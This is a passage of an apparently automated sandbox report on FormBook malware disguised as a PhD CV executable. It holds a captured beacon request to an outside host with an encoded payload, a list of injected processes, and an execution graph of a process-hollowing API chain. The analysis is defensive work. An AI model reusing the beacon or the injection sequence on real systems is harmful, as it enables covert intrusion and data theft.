                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                85192.168.11.20498363.33.130.19080
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:06:32.724288940 CET503OUTGET /5lh9/?Lr3=uHMLTHRPCpsdapr&IBQP=PaxL/KCEHD9JblfI8738jkEyOBGmpH0n0YqV+FGo7SRz69ewzjAIy/AjxHMCTjWvQh2WDn5x5gTk9H7000rUU48po7SBA+lXfQsIcMqVCaJxO3wRg1gJgNU= HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.bocadolobopetra.net
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:06:32.860625982 CET400INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:06:32 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4c 72 33 3d 75 48 4d 4c 54 48 52 50 43 70 73 64 61 70 72 26 49 42 51 50 3d 50 61 78 4c 2f 4b 43 45 48 44 39 4a 62 6c 66 49 38 37 33 38 6a 6b 45 79 4f 42 47 6d 70 48 30 6e 30 59 71 56 2b 46 47 6f 37 53 52 7a 36 39 65 77 7a 6a 41 49 79 2f 41 6a 78 48 4d 43 54 6a 57 76 51 68 32 57 44 6e 35 78 35 67 54 6b 39 48 37 30 30 30 72 55 55 34 38 70 6f 37 53 42 41 2b 6c 58 66 51 73 49 63 4d 71 56 43 61 4a 78 4f 33 77 52 67 31 67 4a 67 4e 55 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Lr3=uHMLTHRPCpsdapr&IBQP=PaxL/KCEHD9JblfI8738jkEyOBGmpH0n0YqV+FGo7SRz69ewzjAIy/AjxHMCTjWvQh2WDn5x5gTk9H7000rUU48po7SBA+lXfQsIcMqVCaJxO3wRg1gJgNU="}</script></head></html>


                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:0
                                                                                                Start time:10:57:31
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe"
                                                                                                Imagebase:0xdf0000
                                                                                                File size:747'008 bytes
                                                                                                MD5 hash:DE148DC1610A111AF0B004E4D0D851A4
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:2
                                                                                                Start time:10:57:46
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe"
                                                                                                Imagebase:0x490000
                                                                                                File size:747'008 bytes
                                                                                                MD5 hash:DE148DC1610A111AF0B004E4D0D851A4
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.30065570043.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.30065763340.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:3
                                                                                                Start time:11:00:37
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe"
                                                                                                Imagebase:0xa80000
                                                                                                File size:140'800 bytes
                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.33208941967.0000000002770000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:4
                                                                                                Start time:11:00:39
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                                Imagebase:0x490000
                                                                                                File size:22'016 bytes
                                                                                                MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.33208901058.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.33208982855.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:moderate
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:5
                                                                                                Start time:11:00:52
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe"
                                                                                                Imagebase:0xa80000
                                                                                                File size:140'800 bytes
                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.33208331721.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:6
                                                                                                Start time:11:01:05
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                Imagebase:0x7ff66d3e0000
                                                                                                File size:597'432 bytes
                                                                                                MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:8.6%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:2.7%
                                                                                                  Total number of Nodes:226
                                                                                                  Total number of Limit Nodes:5
                                                                                                  execution_graph 36584 78897aa 36585 7889771 36584->36585 36586 7889781 36584->36586 36590 7889fce 36585->36590 36607 7889f70 36585->36607 36623 7889f60 36585->36623 36591 7889f5c 36590->36591 36592 7889fd1 36590->36592 36593 7889fae 36591->36593 36639 788a66f 36591->36639 36644 788a5d7 36591->36644 36649 788a4f6 36591->36649 36654 788a4d6 36591->36654 36659 788a715 36591->36659 36664 788aaf4 36591->36664 36668 788a632 36591->36668 36673 788a89e 36591->36673 36678 788a578 36591->36678 36683 788a7b8 36591->36683 36687 788a3c7 36591->36687 36692 788a783 36591->36692 36697 788a822 36591->36697 36592->36586 36593->36586 36608 7889f8a 36607->36608 36609 7889fae 36608->36609 36610 788a66f 2 API calls 36608->36610 36611 788a822 2 API calls 36608->36611 36612 788a783 2 API calls 36608->36612 36613 788a3c7 2 API calls 36608->36613 36614 788a7b8 2 API calls 36608->36614 36615 788a578 2 API calls 36608->36615 36616 788a89e 2 API calls 36608->36616 36617 788a632 2 API calls 36608->36617 36618 788aaf4 2 API calls 36608->36618 36619 788a715 2 API calls 36608->36619 36620 788a4d6 2 API calls 36608->36620 36621 788a4f6 2 API calls 36608->36621 36622 788a5d7 2 API calls 36608->36622 36609->36586 36610->36609 36611->36609 36612->36609 36613->36609 36614->36609 36615->36609 36616->36609 36617->36609 36618->36609 36619->36609 36620->36609 36621->36609 36622->36609 36624 7889f70 36623->36624 36625 7889fae 36624->36625 36626 788a66f 2 API calls 36624->36626 36627 788a822 2 API calls 36624->36627 36628 788a783 2 API calls 36624->36628 36629 788a3c7 2 API calls 36624->36629 36630 788a7b8 2 API calls 36624->36630 36631 788a578 2 API calls 36624->36631 36632 788a89e 2 API calls 36624->36632 36633 788a632 2 API calls 36624->36633 36634 788aaf4 2 API calls 36624->36634 36635 788a715 2 API calls 36624->36635 36636 788a4d6 2 API calls 36624->36636 36637 788a4f6 2 API calls 36624->36637 36638 788a5d7 2 API calls 36624->36638 36625->36586 36626->36625 36627->36625 36628->36625 36629->36625 36630->36625 36631->36625 36632->36625 36633->36625 36634->36625 36635->36625 36636->36625 36637->36625 36638->36625 36640 788abbe 36639->36640 36702 7888da8 36640->36702 36706 7888da1 36640->36706 36641 788abdc 36645 788a5e1 36644->36645 36710 7888e68 36645->36710 36714 7888e60 36645->36714 36646 788a613 36646->36593 36650 788a796 36649->36650 36652 7888e68 WriteProcessMemory 36650->36652 36653 7888e60 WriteProcessMemory 36650->36653 36651 788ab67 36652->36651 36653->36651 36655 788aa10 36654->36655 36718 7888cc8 36655->36718 36722 7888cd0 36655->36722 36656 788aa2b 36660 788a71b 36659->36660 36726 7888f58 36660->36726 36730 7888f50 36660->36730 36661 788a73e 36666 7888e68 WriteProcessMemory 36664->36666 36667 7888e60 WriteProcessMemory 36664->36667 36665 788ab24 36666->36665 36667->36665 36669 788a71c 36668->36669 36670 788a73e 36669->36670 36671 7888f58 ReadProcessMemory 36669->36671 36672 7888f50 ReadProcessMemory 36669->36672 36671->36670 36672->36670 36674 788a8a4 36673->36674 36734 7888c18 36674->36734 36738 7888c20 36674->36738 36675 788a432 36679 788a588 36678->36679 36681 7888c18 ResumeThread 36679->36681 36682 7888c20 ResumeThread 36679->36682 36680 788a432 36681->36680 36682->36680 36685 7888cc8 Wow64SetThreadContext 36683->36685 36686 7888cd0 Wow64SetThreadContext 36683->36686 36684 788a4ae 36684->36593 36685->36684 36686->36684 36688 788a3cd 36687->36688 36742 78890f0 36688->36742 36746 78890e4 36688->36746 36693 788a5f2 36692->36693 36694 788a613 36692->36694 36695 7888e68 WriteProcessMemory 36693->36695 36696 7888e60 WriteProcessMemory 36693->36696 36694->36593 36695->36694 36696->36694 36698 788a828 36697->36698 36700 7888c18 ResumeThread 36698->36700 36701 7888c20 ResumeThread 36698->36701 36699 788a432 36700->36699 36701->36699 36703 7888de8 VirtualAllocEx 36702->36703 36705 7888e25 36703->36705 36705->36641 36707 7888da8 VirtualAllocEx 36706->36707 36709 7888e25 36707->36709 36709->36641 36711 7888eb0 WriteProcessMemory 36710->36711 36713 7888f07 36711->36713 36713->36646 36715 7888e65 WriteProcessMemory 36714->36715 36717 7888f07 36715->36717 36717->36646 36719 7888d15 Wow64SetThreadContext 36718->36719 36721 7888d5d 36719->36721 36721->36656 36723 7888d15 Wow64SetThreadContext 36722->36723 36725 7888d5d 36723->36725 36725->36656 36727 7888fa3 ReadProcessMemory 36726->36727 36729 7888fe7 36727->36729 36729->36661 36731 7888f58 ReadProcessMemory 36730->36731 36733 7888fe7 36731->36733 36733->36661 36735 7888c60 ResumeThread 36734->36735 36737 7888c91 36735->36737 36737->36675 36739 7888c60 ResumeThread 36738->36739 36741 7888c91 36739->36741 36741->36675 36743 7889179 CreateProcessA 36742->36743 36745 788933b 36743->36745 36747 7889179 CreateProcessA 36746->36747 36749 788933b 36747->36749 36750 5f2ba90 36752 5f2bab7 36750->36752 36751 5f2bbb9 36752->36751 36754 788b0e0 36752->36754 36755 788b0e3 36754->36755 36756 788b08c 36754->36756 36755->36756 36758 78878c0 36755->36758 36756->36751 36759 788b370 PostMessageW 36758->36759 36760 788b3dc 36759->36760 36760->36755 36761 19b4668 36762 19b467a 36761->36762 36763 19b4686 36762->36763 36767 19b4778 36762->36767 36772 19b4210 36763->36772 36765 19b46a5 36768 19b479d 36767->36768 36776 19b4879 36768->36776 36780 19b4888 36768->36780 36773 19b421b 36772->36773 36788 19b705c 36773->36788 36775 19b73fb 36775->36765 36778 19b4888 36776->36778 36777 19b498c 36777->36777 36778->36777 36784 19b44d4 36778->36784 36782 19b48af 36780->36782 36781 19b498c 36781->36781 36782->36781 36783 19b44d4 CreateActCtxA 36782->36783 36783->36781 36785 19b5918 CreateActCtxA 36784->36785 36787 19b59db 36785->36787 36787->36787 36789 19b7067 36788->36789 36792 19b708c 36789->36792 36791 19b7665 36791->36775 36793 19b7097 36792->36793 36796 19b70bc 36793->36796 36795 19b7742 36795->36791 36797 19b70c7 36796->36797 36800 19b70ec 36797->36800 36799 19b7845 36799->36795 36801 19b70f7 36800->36801 36807 19b7360 36801->36807 36803 19b8c69 36803->36799 36804 19b8a40 36804->36803 36811 19bd090 36804->36811 36816 19bd081 36804->36816 36808 19b736b 36807->36808 36809 19b9ed9 36808->36809 36821 19b891c 36808->36821 36809->36804 36812 19bd0b1 36811->36812 36813 19bd0d5 36812->36813 36825 19bd638 36812->36825 36829 19bd648 36812->36829 36813->36803 36817 19bd0b1 36816->36817 36818 19bd0d5 36817->36818 36819 19bd638 FindWindowW 36817->36819 36820 19bd648 FindWindowW 36817->36820 36818->36803 36819->36818 36820->36818 36822 19ba038 FindWindowW 36821->36822 36824 19ba0bd 36822->36824 36824->36809 36826 19bd648 36825->36826 36828 19bd68f 36826->36828 36833 19bd450 36826->36833 36828->36813 36830 19bd655 36829->36830 36831 19bd450 FindWindowW 36830->36831 36832 19bd68f 36830->36832 36831->36832 36832->36813 36834 19bd455 36833->36834 36836 19bdfa0 36834->36836 36837 19bd57c 36834->36837 36836->36836 36838 19bd587 36837->36838 36839 19b70ec FindWindowW 36838->36839 36840 19be00f 36839->36840 36840->36836 36567 5f260e8 36568 5f26122 36567->36568 36569 5f261b3 36568->36569 36570 5f2619e 36568->36570 36572 5f2340c CreateIconFromResourceEx 36569->36572 36575 5f2340c 36570->36575 36574 5f261c2 36572->36574 36576 5f23417 36575->36576 36577 5f261a9 36576->36577 36579 5f26af8 36576->36579 36580 5f26b22 36579->36580 36581 5f26b2f 36580->36581 36582 5f26b8f CreateIconFromResourceEx 36580->36582 36581->36577 36583 5f26bd6 36582->36583 36583->36577 36559 19bb3d0 36562 19bb4b8 36559->36562 36560 19bb3df 36563 19bb4fc 36562->36563 36564 19bb4d9 36562->36564 36563->36560 36564->36563 36565 19bb700 GetModuleHandleW 36564->36565 36566 19bb72d 36565->36566 36566->36560 36841 19bd760 36842 19bd7a6 36841->36842 36846 19bd93b 36842->36846 36850 19bd940 36842->36850 36843 19bd893 36847 19bd940 36846->36847 36853 19bd518 36847->36853 36851 19bd518 DuplicateHandle 36850->36851 36852 19bd96e 36851->36852 36852->36843 36854 19bd9a8 DuplicateHandle 36853->36854 36855 19bd96e 36854->36855 36855->36843

                                                                                                  Executed Functions

                                                                                                  Function 05F2BF88 Relevance: 3.1, Strings: 2, Instructions: 562COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 5f2bf88-5f2bfb0 1 5f2bfb2 0->1 2 5f2bfb7-5f2c073 0->2 1->2 5 5f2c075-5f2c076 2->5 6 5f2c078-5f2c085 2->6 7 5f2c097-5f2c09b 5->7 6->5 6->7 8 5f2c0a1-5f2c0cb 7->8 9 5f2c58b-5f2c5cd 7->9 12 5f2c0d1-5f2c0e9 8->12 13 5f2c798-5f2c7a4 8->13 18 5f2c5d0-5f2c5d4 9->18 14 5f2c7aa-5f2c7b3 12->14 15 5f2c0ef-5f2c0f0 12->15 13->14 23 5f2c7b9-5f2c7c5 14->23 17 5f2c77e-5f2c78a 15->17 21 5f2c790-5f2c797 17->21 22 5f2c0f5-5f2c101 17->22 19 5f2c1a6-5f2c1aa 18->19 20 5f2c5da-5f2c5e0 18->20 25 5f2c1bc-5f2c1c2 19->25 26 5f2c1ac-5f2c1ba 19->26 20->9 24 5f2c5e2-5f2c63d 20->24 27 5f2c103 22->27 28 5f2c108-5f2c123 22->28 32 5f2c7cb-5f2c7d7 23->32 47 5f2c674-5f2c69e 24->47 48 5f2c63f-5f2c672 24->48 30 5f2c207-5f2c20b 25->30 29 5f2c21a-5f2c24c 26->29 27->28 28->23 31 5f2c129-5f2c14e 28->31 54 5f2c276 29->54 55 5f2c24e-5f2c25a 29->55 33 5f2c1c4-5f2c1d0 30->33 34 5f2c20d 30->34 31->32 46 5f2c154-5f2c156 31->46 36 5f2c7dd-5f2c7e4 32->36 39 5f2c1d2 33->39 40 5f2c1d7-5f2c1df 33->40 37 5f2c210-5f2c214 34->37 37->29 42 5f2c18c-5f2c1a3 37->42 39->40 44 5f2c1e1-5f2c1f5 40->44 45 5f2c204 40->45 42->19 50 5f2c1fb-5f2c202 44->50 51 5f2c159-5f2c164 44->51 45->30 46->51 62 5f2c6a7-5f2c726 47->62 48->62 50->34 51->36 52 5f2c16a-5f2c187 51->52 52->37 60 5f2c27c-5f2c2a9 54->60 57 5f2c264-5f2c26a 55->57 58 5f2c25c-5f2c262 55->58 63 5f2c274 57->63 58->63 67 5f2c2ab-5f2c2e3 60->67 68 5f2c2f8-5f2c38b 60->68 75 5f2c72d-5f2c740 62->75 63->60 76 5f2c74f-5f2c754 67->76 83 5f2c394-5f2c395 68->83 84 5f2c38d 68->84 75->76 77 5f2c756-5f2c764 76->77 78 5f2c76b-5f2c77b 76->78 77->78 78->17 85 5f2c3e6-5f2c3ec 83->85 84->83 86 5f2c397-5f2c3b6 85->86 87 5f2c3ee-5f2c4b0 85->87 88 5f2c3b8 86->88 89 5f2c3bd-5f2c3e3 86->89 98 5f2c4b2-5f2c4eb 87->98 99 5f2c4f1-5f2c4f5 87->99 88->89 89->85 98->99 100 5f2c536-5f2c53a 99->100 101 5f2c4f7-5f2c530 99->101 102 5f2c57b-5f2c57f 100->102 103 5f2c53c-5f2c575 100->103 101->100 102->24 106 5f2c581-5f2c589 102->106 103->102 106->18
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281306470.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5f20000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: :$~
                                                                                                  • API String ID: 0-2431124681
                                                                                                  • Opcode ID: 0d1c091694bcf3ca82c187cde2e01028c0139896a173a370f61f7fe65b19869e
                                                                                                  • Instruction ID: dc36e3cfc2cf22bdd62143f134a86b212b728c5b4e0d848a08ea33ddc9cfee71
                                                                                                  • Opcode Fuzzy Hash: 0d1c091694bcf3ca82c187cde2e01028c0139896a173a370f61f7fe65b19869e
                                                                                                  • Instruction Fuzzy Hash: A442D1B5A00228DFDB15CFA9C984BADBBB2FF49300F1580E9E509AB261D7359D91CF50
                                                                                                  Function 0788C020 Relevance: .6, Instructions: 626COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7d5fde27cc70228634edf72969ca51bb3d00d5bae8af011c0ceba0ccac6c62cd
                                                                                                  • Instruction ID: c24951ed070cfbb4eaaa4df51a9017711880fa049de478ca917a3ca8f57b4bbe
                                                                                                  • Opcode Fuzzy Hash: 7d5fde27cc70228634edf72969ca51bb3d00d5bae8af011c0ceba0ccac6c62cd
                                                                                                  • Instruction Fuzzy Hash: 77328BB0B012059FDB59EFA9C590BAEB7F6AF98300F1444A9E506DB3A4CB35DD01CB61
                                                                                                  Function 05F2340C Relevance: .6, Instructions: 625COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281306470.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5f20000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 211649a51d9a6150042d7384fa044884c85c5f21ab056a21383f342bc1c4f2be
                                                                                                  • Instruction ID: 18765166defae97b68997d19dd36147a88f03b7a7062035b37d142cfc2f944ae
                                                                                                  • Opcode Fuzzy Hash: 211649a51d9a6150042d7384fa044884c85c5f21ab056a21383f342bc1c4f2be
                                                                                                  • Instruction Fuzzy Hash: 033260B1E012248FDB54DFA9C850BAEBBF2BF84300F148469D449EB395DE389D45CB95
                                                                                                  Function 05F2F187 Relevance: .3, Instructions: 307COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281306470.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5f20000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c92670d2173328bef141ff0908c80b822616fc9b57882b0b677ecc5549ee5219
                                                                                                  • Instruction ID: 384b489c6cd6c92a7b16eff6863bfe14bf69738798cee746580a22e770d5233e
                                                                                                  • Opcode Fuzzy Hash: c92670d2173328bef141ff0908c80b822616fc9b57882b0b677ecc5549ee5219
                                                                                                  • Instruction Fuzzy Hash: 0AD1D2B5E142298FDB14CFA9C981AADBBF2BF89300F24816AD819E7355D7349941CF50
                                                                                                  Function 05F23409 Relevance: .3, Instructions: 280COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281306470.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5f20000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6a6263a74da355adb63faf3e0dc38dff2b82a14599af9f349f31967cf9630580
                                                                                                  • Instruction ID: 56ae73761d09b60dab2456c876b3f9d49e75635799c70fae4e7da0ef947bd13b
                                                                                                  • Opcode Fuzzy Hash: 6a6263a74da355adb63faf3e0dc38dff2b82a14599af9f349f31967cf9630580
                                                                                                  • Instruction Fuzzy Hash: A5C14CB1E002649FDF15CF65C884B9DBBB2BF88310F14C5AAD849AB255DB38E985CF50
                                                                                                  Function 05F261D1 Relevance: .3, Instructions: 280COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281306470.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5f20000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 92efe5f4d660ecf53e8fcad04ecee5b2e5449c9606676534ee072e57d7c2c3dc
                                                                                                  • Instruction ID: e0dc3cedba9a53cdb706978a45712f456b923b78b24fc945d809d15814ab1e7a
                                                                                                  • Opcode Fuzzy Hash: 92efe5f4d660ecf53e8fcad04ecee5b2e5449c9606676534ee072e57d7c2c3dc
                                                                                                  • Instruction Fuzzy Hash: 12C13BB1E002649FDF15CFA5C880B9DBBB2BF88310F14C5AAD849AB255DB38D985CF50
                                                                                                  Function 019B7390 Relevance: .2, Instructions: 174COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7cd48346b61f89fa4d57c37734d454f3d9b27bee309b2a905b616ad79c0dddac
                                                                                                  • Instruction ID: ecd747f5716c20aad65a6a7eeb4dc0b90573a9779a55750278ad8c9c3188a882
                                                                                                  • Opcode Fuzzy Hash: 7cd48346b61f89fa4d57c37734d454f3d9b27bee309b2a905b616ad79c0dddac
                                                                                                  • Instruction Fuzzy Hash: 3271D874E012099FDB18DFA9D8959EEBBF2FF88300F148169D509AB364DB319C46CB94
                                                                                                  Function 019B4210 Relevance: .2, Instructions: 167COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d72915aa88a4afc1d27ca00f9172cf061206a355372b9d75761e597e5d27706d
                                                                                                  • Instruction ID: f5a8a8d88bc0b4a50c3098a4f8cab12acbadc7e6cc5021ddcbd58aa31b064d4a
                                                                                                  • Opcode Fuzzy Hash: d72915aa88a4afc1d27ca00f9172cf061206a355372b9d75761e597e5d27706d
                                                                                                  • Instruction Fuzzy Hash: 0A71C574E012099FDB18DFA9C8959EEBBF2FF88300F548169D509AB364DB319C46CB94
                                                                                                  Function 078890E4 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
